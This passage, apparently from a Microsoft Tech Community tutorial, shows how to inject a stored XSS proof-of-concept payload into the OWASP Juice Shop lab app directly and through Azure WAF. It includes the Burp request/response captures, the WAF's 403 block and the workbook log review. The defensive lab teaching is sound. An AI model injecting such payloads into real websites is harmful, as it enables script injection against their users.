through Azure WAF</LI> <UL> <LI>Inject a proof of concept (POC) XSS payload in the target OWASP Juice Shop application directly and then through Azure WAF</LI> </UL> <LI>Observe the difference in the web application behavior in the two scenarios</LI> <LI>Review the summarized logs in the WAF Workbook (<A title="Azure Monitor Workbook for WAF" href="#" target="_blank" rel="noopener">Azure Monitor Workbook for WAF</A>)</LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Prerequisites</H2> <P>&nbsp;</P> <OL> <LI><A title="Setup an Azure WAF Attack Testing Lab" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-1-lab-setup-azure-web-application-firewall-security/ba-p/2030469" target="_blank" rel="noopener">A completed Azure WAF security lab setup</A> <UL> <LI>We recommend following the lab setup instructions as closely as possible. The closer your lab is to the suggested lab setup, the easier it will be to follow the Azure WAF testing procedures.</LI> </UL> </LI> <LI><A title="Reconnaissance Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-2-reconnaissance-playbook-azure-waf-security-protection-and/ba-p/2030751" target="_blank" rel="noopener">Completion of the reconnaissance playbook tutorial</A></LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Configuring Burp Suite and Firefox</H2> <P>&nbsp;</P> <P>To inject the POC XSS exploit code in the OWASP Juice Shop application, we will connect to the Kali VM with RDP.&nbsp; Once connected, we will use <A href="#" target="_blank" rel="noopener"><STRONG>Burp Suite (Community Edition)</STRONG></A>, a powerful web application security research and analysis tool which is bundled in the Kali Linux distro.&nbsp; In this playbook, we will be using Burp Suite to inspect application requests and responses to understand what happens when injecting the POC XSS payload in the target web application in different scenarios.</P> <P>&nbsp;</P> <P>Burp Suite works as a client-side proxy and 
your web browser should point to Burp's Proxy Listener so that it can intercept requests and responses.&nbsp;</P> <P>&nbsp;</P> <OL> <LI>Sign in to the Kali VM using your lab credentials</LI> <LI>Launch the web browser and ensure that you are able to access the OWASP Juice Shop website directly with URL http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net and also through Azure WAF with URL <A href="#" target="_blank" rel="noopener">http://juiceshopthruazwaf.com</A></LI> <LI>Launch <STRONG>Burp Suite</STRONG> by clicking on <STRONG>Applications</STRONG> on the top left and then click <STRONG>Web Application Analysis --&gt; burpsuite</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609891633850.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244430i76B4419777E1F8E1/image-size/medium?v=v2&amp;px=400" role="button" title="Mohit_Kumar_0-1609891633850.png" alt="Mohit_Kumar_0-1609891633850.png" /></span></P> <P>&nbsp;</P> <OL start="4"> <LI>In the "Burp Suite Community Edition" window, accept the defaults <STRONG>(Temporary project --&gt; Use Burp defaults --&gt; Start Burp) </STRONG>to start Burp Suite</LI> </OL> <P class="lia-indent-padding-left-30px"><BR /><FONT size="2"><STRONG>Figure 1 - Launch Burp Suite</STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609798395329.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244072i633D15EC51C07A10/image-size/medium?v=v2&amp;px=400" role="button" title="Mohit_Kumar_1-1609798395329.png" alt="Mohit_Kumar_1-1609798395329.png" /></span></P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Figure 2 - Launch Burp Suite</STRONG></FONT></P> <P 
class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609798603320.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244075i49E2DA2C741479E7/image-size/medium?v=v2&amp;px=400" role="button" title="Mohit_Kumar_0-1609798603320.png" alt="Mohit_Kumar_0-1609798603320.png" /></span></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <OL start="5"> <LI>When open, click on <STRONG>Target --&gt; Scope </STRONG>tabs and then add the 2 URLs for the Juice Shop website in the "<STRONG>Include in scope</STRONG>" box.&nbsp; This will setup Burp to only capture requests and responses for these specific websites while excluding traffic going to other destinations</LI> </OL> <P class="lia-indent-padding-left-60px">a. http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net</P> <P class="lia-indent-padding-left-60px" data-unlink="true">b. http://juiceshopthruazwaf.com/&nbsp;&nbsp;</P> <P>&nbsp;</P> <OL start="6"> <LI>The exclusions in the "<STRONG>Exclude from scope</STRONG>" are optional and will help reduce noise in the capture</LI> </OL> <P class="lia-indent-padding-left-60px">a. http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net/socket.io/</P> <P class="lia-indent-padding-left-60px" data-unlink="true">b. 
http://juiceshopthruazwaf.com/socket.io/</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609799465020.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244079iC0593408CAB9BB9F/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609799465020.png" alt="Mohit_Kumar_0-1609799465020.png" /></span></P> <P class="lia-indent-padding-left-30px"><FONT size="2"><FONT color="#FF0000"><STRONG>!</STRONG></FONT><STRONG> IMPORTANT</STRONG>: &nbsp;For the scenarios demonstrated in this document, OWASP Juice Shop application was running on HTTP port 3000.&nbsp; This is not the case when you use the Azure WAF Attack Testing Lab Deployment Template as it configures the application to run on port 80, 443 and assigns it a URL.&nbsp; For the lab tutorials, you will connect to the application on HTTP port 80 only.&nbsp; The URL for the application will be http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net.&nbsp; &lt;deployment guid&gt; is unique to every deployment&nbsp;</FONT></P> <P>&nbsp;</P> <OL start="7"> <LI>Then click on the <STRONG>Proxy --&gt; Options </STRONG>tabs and verify that Burp Proxy is running on <STRONG>127.0.0.1:8080</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609799542335.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244080i2C42B4D29909BCC3/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1609799542335.png" alt="Mohit_Kumar_1-1609799542335.png" /></span></P> <P>&nbsp;</P> <OL start="8"> <LI>Click on the <STRONG>Intercept</STRONG> tab and turn off intercept</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper 
lia-image-align-inline" image-alt="Mohit_Kumar_2-1609799645213.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244081i7DD18C488FD7CD9C/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_2-1609799645213.png" alt="Mohit_Kumar_2-1609799645213.png" /></span></P> <P>&nbsp;</P> <OL start="9"> <LI>Launch Firefox browser on the Kali Linux VM and update the proxy settings to use Burp proxy listener under <STRONG>Menu --&gt; Preferences --&gt; Network Proxy --&gt; Settings --&gt; Manual proxy </STRONG>configuration and point it to <STRONG>127.0.0.1:8080</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_3-1609799670464.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244082i931EE54BFFE023C8/image-size/medium?v=v2&amp;px=400" role="button" title="Mohit_Kumar_3-1609799670464.png" alt="Mohit_Kumar_3-1609799670464.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Vulnerability Exploitation</H2> <P>&nbsp;</P> <P>After collecting and analyzing web application specific data from the various recon activities to detect vulnerabilities, an attacker can then successfully exploit the identified vulnerabilities with the intent to compromise a user or the application itself to elevate privileges.&nbsp; In this playbook, we will simulate a Cross Site Scripting (XSS) attack against the target application using a proof of concept (POC) exploit payload.</P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Performing Cross Site Scripting (XSS) Attack against the Target Web Application</H2> <P>&nbsp;</P> <P>In this tutorial, you will perform a <STRONG>Server Side Cross Site Scripting (XSS)</STRONG> attack against the <STRONG>OWASP Juice Shop</STRONG> application two times.&nbsp;</P> <P>&nbsp;</P> <OL> <LI><STRONG>Scenario 1</STRONG>: Injecting the XSS payload in the target 
web application directly</LI> <LI><STRONG>Scenario 2</STRONG>: Injecting the same XSS payload in the same target web application protected by Azure WAF on Application Gateway</LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Scenario 1:&nbsp; Injecting XSS payload when going to the OWASP Juice Shop Application directly</H3> <P>&nbsp;</P> <OL> <LI>Sign into the Kali VM using your lab credentials</LI> <LI>Using Firefox, browse directly to the Juice Shop site by going to http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net</LI> <LI>In Burp Suite, check the <STRONG>Proxy --&gt; HTTP history</STRONG> tab for request and response data&nbsp;for this website</LI> <LI>Click the website menu icon on the top left and then click on <STRONG>Customer Feedback</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609800025433.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244085i6847FFDC63B90A34/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609800025433.png" alt="Mohit_Kumar_0-1609800025433.png" /></span></P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><STRONG><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609800066965.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244086i96BE67941678121C/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1609800066965.png" alt="Mohit_Kumar_1-1609800066965.png" /></span></STRONG></P> <P class="lia-indent-padding-left-30px"><FONT size="2"><FONT color="#FF0000"><STRONG>!</STRONG></FONT><STRONG> IMPORTANT</STRONG>: &nbsp;For the scenarios demonstrated in this document, OWASP Juice Shop application was running on HTTP port 3000.&nbsp; This is not the case when you use the Azure WAF Attack Testing Lab Deployment Template as it 
configures the application to run on port 80, 443 and assigns it a URL.&nbsp; For the lab tutorials, you will connect to the application on HTTP port 80 only.&nbsp; The URL for the application will be http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net.&nbsp; &lt;deployment guid&gt; is unique to every deployment&nbsp;</FONT></P> <P>&nbsp;</P> <OL start="5"> <LI>In the <STRONG>Comment </STRONG>box of the <STRONG>Customer Feedback</STRONG> form, copy/paste the POC code<LI-CODE lang="javascript">&lt;iframe src="javascript&amp;colon;alert(`xss`)"&gt;</LI-CODE></LI> </OL> <OL start="6"> <LI>Give a <STRONG>Rating,</STRONG> respond to the <STRONG>CAPTCHA </STRONG>challenge and click <STRONG>Submit</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_2-1609800135831.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244087i911FCD10C59DC851/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_2-1609800135831.png" alt="Mohit_Kumar_2-1609800135831.png" /></span></P> <P>&nbsp;</P> <OL start="7"> <LI>Upon clicking <STRONG>Submit</STRONG>, you should see a <STRONG>Thank you </STRONG>message</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_3-1609800164802.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244088iDF314C45B67B09FC/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_3-1609800164802.png" alt="Mohit_Kumar_3-1609800164802.png" /></span></P> <P>&nbsp;</P> <OL start="8"> <LI>Switching back to Burp, we can see the following request and response for the Feedback that we submitted in Step 4 above</LI> </OL> <P>&nbsp;</P> <H3 class="lia-indent-padding-left-30px"><FONT 
size="2"><STRONG>Figure 1 – Request with XSS Payload in Burp Suite</STRONG></FONT></H3> <H3 class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609800320499.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244089i4EAFCD64A3ABB48B/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609800320499.png" alt="Mohit_Kumar_0-1609800320499.png" /></span></H3> <P>&nbsp;</P> <H3 class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Figure 2 – Successful Response from Juice Shop in Burp Suite</STRONG></FONT></H3> <H3 class="lia-indent-padding-left-30px"><FONT size="2"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609800331974.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244090i87E0B09DC5A0A232/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1609800331974.png" alt="Mohit_Kumar_1-1609800331974.png" /></span></FONT></H3> <P>&nbsp;</P> <P><FONT size="2"><STRONG>Raw Request and Response - Headers and Body</STRONG></FONT></P> <TABLE border="1" width="99.86187845303867%"> <TBODY> <TR> <TD width="52.62430939226519%" height="60px"> <H3><FONT size="2"><STRONG>Request</STRONG></FONT></H3> </TD> <TD width="47.23756906077348%" height="60px"> <H3><FONT size="2"><STRONG>Response</STRONG></FONT></H3> </TD> </TR> <TR> <TD width="52.62430939226519%" height="489px"> <P><FONT size="2">POST /api/Feedbacks/ HTTP/1.1</FONT></P> <P><FONT size="2">Host: juiceshopdirect.com:3000</FONT></P> <P><FONT size="2">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0</FONT></P> <P><FONT size="2">Accept: application/json, text/plain, */*</FONT></P> <P><FONT size="2">Accept-Language: en-US,en;q=0.5</FONT></P> <P><FONT size="2">Accept-Encoding: gzip, deflate</FONT></P> 
<P><FONT size="2">Referer: <A href="#" target="_blank" rel="noopener">http://juiceshopdirect.com:3000/</A></FONT></P> <P><FONT size="2">Content-Type: application/json</FONT></P> <P><FONT size="2">Content-Length: 105</FONT></P> <P><FONT size="2">Cookie: io=LsYFH7-IUxnCTaU5AAAW; language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss</FONT></P> <P><FONT size="2">Connection: close</FONT></P> <P><FONT size="2">&nbsp;</FONT></P> <P><FONT size="2">{"captchaId":7,"captcha":"3","comment":"<STRONG>&lt;iframe src=\"javascript&amp;colon;alert(`xss`)\"&gt;</STRONG> (anonymous)","rating":3}</FONT></P> </TD> <TD width="47.23756906077348%" height="489px"> <P><FONT size="2">HTTP/1.1 <STRONG>201 Created</STRONG></FONT></P> <P><FONT size="2">Access-Control-Allow-Origin: *</FONT></P> <P><FONT size="2">X-Content-Type-Options: nosniff</FONT></P> <P><FONT size="2">X-Frame-Options: SAMEORIGIN</FONT></P> <P><FONT size="2">Feature-Policy: payment 'self'</FONT></P> <P><FONT size="2">Location: /api/Feedbacks/11</FONT></P> <P><FONT size="2">Content-Type: application/json; charset=utf-8</FONT></P> <P><FONT size="2">Content-Length: 205</FONT></P> <P><FONT size="2">ETag: W/"cd-jaYV3gaD4F+1IP1EkEdoiAcNqfQ"</FONT></P> <P><FONT size="2">Vary: Accept-Encoding</FONT></P> <P><FONT size="2">Date: Sat, 10 Oct 2020 23:51:52 GMT</FONT></P> <P><FONT size="2">Connection: close</FONT></P> <P><FONT size="2">&nbsp;</FONT></P> <P><FONT size="2"><STRONG>{"status":"success"</STRONG>,"data":{"id":11,"comment":"&lt;iframe src=\"javascript&amp;colon;alert(`xss`)\"&gt; (anonymous)","rating":3,"updatedAt":"2020-10-10T23:51:52.834Z","createdAt":"2020-10-10T23:51:52.834Z","UserId":null}}</FONT></P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <OL start="9"> <LI>The <STRONG>201 Created</STRONG> response code with a <STRONG>successful status</STRONG> tells us that the malicious POC XSS payload was stored successfully by the web 
application.&nbsp; We can now check if the XSS exploit is indeed working by going to the <STRONG>About Us </STRONG>page of the application.&nbsp; On this page, in addition to the company information, customer feedback is also displayed with rating and comments</LI> <LI>As shown in the image on the right below, as soon as we browse to the <STRONG>About Us </STRONG>page, we see the pop-up, which indicates that the exploit is working as expected</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609967539806.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244608i49C05D9B77A7E095/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609967539806.png" alt="Mohit_Kumar_0-1609967539806.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Scenario 2:&nbsp; Injecting XSS payload when going to the OWASP Juice Shop Application through Azure WAF</H3> <P>&nbsp;</P> <P>We will now attempt to perform the injection of the same XSS payload in the <STRONG>Customer Feedback</STRONG> form on the Juice Shop website when going through Azure WAF on Application Gateway.</P> <P>&nbsp;</P> <OL> <LI>On Kali VM, launch a new instance of Firefox and browse to the Juice Shop website published through Application Gateway and protected with Azure WAF by going to <A href="#" target="_blank" rel="noopener">http://juiceshopthruazwaf.com/</A></LI> <LI>In Burp Suite, check the <STRONG>Proxy --&gt; HTTP history</STRONG> tab for the request and response data for this website</LI> </OL> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip</STRONG>:&nbsp; To see the latest request/response, sort by #</FONT></LI> </UL> <P>&nbsp;</P> <OL start="3"> <LI>In the browser window, click on the website menu icon on the top left and then click on <STRONG>Customer Feedback</STRONG></LI> <LI>In the <STRONG>Comment 
</STRONG>box of the <STRONG>Customer Feedback</STRONG> form, copy/paste the POC code<LI-CODE lang="javascript">&lt;iframe src="javascript&amp;colon;alert(`xss`)"&gt;</LI-CODE></LI> <LI>Give a <STRONG>Rating,</STRONG> respond to the <STRONG>CAPTCHA </STRONG>challenge and click <STRONG>Submit</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_4-1609800602375.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244093iDFDF240CBF4A037E/image-size/medium?v=v2&amp;px=400" role="button" title="Mohit_Kumar_4-1609800602375.png" alt="Mohit_Kumar_4-1609800602375.png" /></span></P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px">6. Upon clicking <STRONG>Submit, </STRONG>you will observe that the thank you message does not&nbsp;show up this time</P> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip: &nbsp;</STRONG>The web application does not provide an error response in this scenario.&nbsp; This is due to the behavior of the Juice Shop application</FONT></LI> </UL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px">7. 
Switching back to Burp, we can see the following request and response for the Feedback that we submitted in Step 5 above</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Figure 1 – Request with XSS Payload in Burp Suite</STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609800801345.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244094i44BDF2E55074AD3E/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609800801345.png" alt="Mohit_Kumar_0-1609800801345.png" /></span></P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Figure 2 – 403 Forbidden Response from Application Gateway in Burp Suite</STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609800816806.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244095i27E31D484FB5F33B/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1609800816806.png" alt="Mohit_Kumar_1-1609800816806.png" /></span></P> <P>&nbsp;</P> <P><FONT size="2"><STRONG>Raw Request and Response - Headers and Body</STRONG></FONT></P> <TABLE border="1" width="99.86187845303868%"> <TBODY> <TR> <TD width="49.58563535911602%"> <P><FONT size="2"><STRONG>Request</STRONG></FONT></P> </TD> <TD width="50.27624309392266%"> <P><FONT size="2"><STRONG>Response</STRONG></FONT></P> </TD> </TR> <TR> <TD width="49.58563535911602%"> <P><FONT size="2">POST /api/Feedbacks/ HTTP/1.1</FONT></P> <P><FONT size="2">Host: juiceshopthruazwaf.com</FONT></P> <P><FONT size="2">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0</FONT></P> <P><FONT size="2">Accept: application/json, text/plain, */*</FONT></P> 
<P><FONT size="2">Accept-Language: en-US,en;q=0.5</FONT></P> <P><FONT size="2">Accept-Encoding: gzip, deflate</FONT></P> <P><FONT size="2">Referer: <A href="#" target="_blank" rel="noopener">http://juiceshopthruazwaf.com/</A></FONT></P> <P><FONT size="2">Content-Type: application/json</FONT></P> <P><FONT size="2">Content-Length: 107</FONT></P> <P><FONT size="2">Cookie: io=ygD2rhS_-3S5-Q_vAAF2; language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss</FONT></P> <P><FONT size="2">Connection: close</FONT></P> <P>&nbsp;</P> <P><FONT size="2">{"captchaId":14,"captcha":"-6","comment":"<STRONG>&lt;iframe src=\"javascript&amp;colon;alert(`xss`)\"&gt;</STRONG> (anonymous)","rating":3}</FONT></P> </TD> <TD width="50.27624309392266%"> <P><FONT size="2">HTTP/1.1 403 Forbidden</FONT></P> <P><FONT size="2">Server: Microsoft-Azure-Application-Gateway/v2</FONT></P> <P><FONT size="2">Date: Sun, 11 Oct 2020 02:26:32 GMT</FONT></P> <P><FONT size="2">Content-Type: text/html</FONT></P> <P><FONT size="2">Content-Length: 179</FONT></P> <P><FONT size="2">Connection: close</FONT></P> <P>&nbsp;</P> <P><FONT size="2">&lt;html&gt;</FONT></P> <P><FONT size="2">&lt;head&gt;&lt;title&gt;<STRONG>403 Forbidden</STRONG>&lt;/title&gt;&lt;/head&gt;</FONT></P> <P><FONT size="2">&lt;body&gt;</FONT></P> <P><FONT size="2">&lt;center&gt;&lt;h1&gt;<STRONG>403 Forbidden</STRONG>&lt;/h1&gt;&lt;/center&gt;</FONT></P> <P><FONT size="2">&lt;hr&gt;&lt;center&gt;<STRONG>Microsoft-Azure-Application-Gateway/v2</STRONG>&lt;/center&gt;</FONT></P> <P><FONT size="2">&lt;/body&gt;</FONT></P> <P><FONT size="2">&lt;/html&gt;</FONT></P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <OL start="8"> <LI>The <STRONG>403 Forbidden</STRONG> response from the <STRONG>Application Gateway</STRONG> tells us that the request with the POC XSS payload was blocked by <STRONG>Azure WAF</STRONG></LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Understanding What Happened&nbsp;</H2> <P>&nbsp;</P> 
<P>Upon reviewing the HTTP requests and responses for the two attempts to inject POC XSS payload to the same instance of the Juice Shop application, we see the pattern as shown in the below table.&nbsp; This clearly indicates that the malicious XSS payload which could otherwise be stored in the application is not allowed through by Azure WAF.</P> <P>&nbsp;</P> <TABLE border="1" width="99.86187845303867%"> <TBODY> <TR> <TD width="50%"> <P><STRONG>XSS Exploitation Route</STRONG></P> </TD> <TD width="49.86187845303867%" class="lia-align-center"> <P><STRONG>Success</STRONG></P> </TD> </TR> <TR> <TD width="50%"> <P>Direct</P> </TD> <TD width="49.86187845303867%" class="lia-align-center"> <P>Yes</P> </TD> </TR> <TR> <TD width="50%"> <P>Through WAF</P> </TD> <TD width="49.86187845303867%" class="lia-align-center"> <P>No</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>Now let us use the <A title="Azure Monitor Workbook for WAF" href="#" target="_blank" rel="noopener">Azure Monitor Workbook for WAF</A> to understand how the WAF handled traffic with the <STRONG>XSS payload</STRONG>.&nbsp; This workbook visualizes security relevant WAF events across several filterable panels.&nbsp; <EM>It works with all WAF types, including Application Gateway, Front Door, and CDN, and can be filtered based on WAF type or a specific WAF instance.</EM></P> <P>&nbsp;</P> <P><A title="Deploy Azure Monitor Workbook for WAF" href="#" target="_blank" rel="noopener">Click here</A> to deploy <STRONG>Azure Monitor Workbook for WAF</STRONG> to your subscription in Azure.</P> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip</STRONG>: &nbsp;To understand what is happening when traffic with XSS payload destined for the Juice Shop application goes through the Azure WAF, you can also examine the log entries associated with <STRONG>ApplicationGatewayFirewallLog </STRONG>in the<STRONG> Azure Monitor</STRONG></FONT></LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> <H3><FONT 
size="3">Reviewing WAF logs in the Workbook</FONT></H3> <P>&nbsp;</P> <OL> <LI>You can access the WAF workbook by going into the Workbook blade and then selecting the WAF workbook deployed for this testing.&nbsp; Once in the workbook, ensure that you have selected the appropriate <STRONG>Time Range</STRONG>, <STRONG>WAF Type and WAF Items</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609801204836.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244099iC5A7EDFC78351249/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609801204836.png" alt="Mohit_Kumar_0-1609801204836.png" /></span></P> <P>&nbsp;</P> <OL start="2"> <LI>You should also ensure that you have selected the correct Public IP address for your attacker machine (Kali VM) in the <STRONG>Top 10 Attacking IP Addresses, filter to single IP address </STRONG>pane</LI> </OL> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip</STRONG>:&nbsp; If you are using the <SPAN>Azure WAF Attack Testing Lab Environment Deployment Template</SPAN> and have followed the lab setup instructions then the client IP address will be the public IP address of the Azure Firewall in your demo environment</FONT></LI> </UL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609894963883.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244443iE4540EFF84613A75/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609894963883.png" alt="Mohit_Kumar_0-1609894963883.png" /></span></P> <P>&nbsp;</P> <OL start="3"> <LI>After selecting the correct client IP, we scroll back up to the top of the Workbook and review the visualizations at the top, in the WAF 
Workbook.&nbsp; <SPAN>Following are the sections of the workbook we will be using as called out in the figure&nbsp;below </SPAN></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px">a. WAF actions filter</P> <P class="lia-indent-padding-left-60px">b. Top 40 Blocked Request URI addresses, filter to single URI address</P> <P class="lia-indent-padding-left-60px">c. Top 50 event trigger, filter by rule name</P> <P class="lia-indent-padding-left-60px">d. Message, full details</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609895311056.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244446iF737E62BFC002587/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1609895311056.png" alt="Mohit_Kumar_1-1609895311056.png" /></span></P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Note</STRONG>:<STRONG>&nbsp; </STRONG>For a detailed overview of these sections of the WAF workbook, please refer to the<STRONG> Overview of the Workbook Sections</STRONG> in the previous tutorial, <A title="Reconnaissance Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-2-reconnaissance-playbook-azure-waf-security-protection-and/ba-p/2030751" target="_self">Reconnaissance Playbook</A></FONT></P> <P>&nbsp;</P> <OL start="4"> <LI>From the sliced data in the WAF workbook, we can see that two requests to the <STRONG>/api/Feedbacks/</STRONG> URI were blocked by WAF.&nbsp; Upon reviewing the <STRONG>Top 50 event trigger, filter by rule name </STRONG>we see all the rules which evaluated the POC XSS payload in the request; the <STRONG>Message, full details </STRONG>section shows that the traffic was blocked by Mandatory rule because the Anomaly Score threshold was exceeded <STRONG>(Total Score: 53, XSS=35)</STRONG> with XSS attack being the closest match</LI> <LI>The 
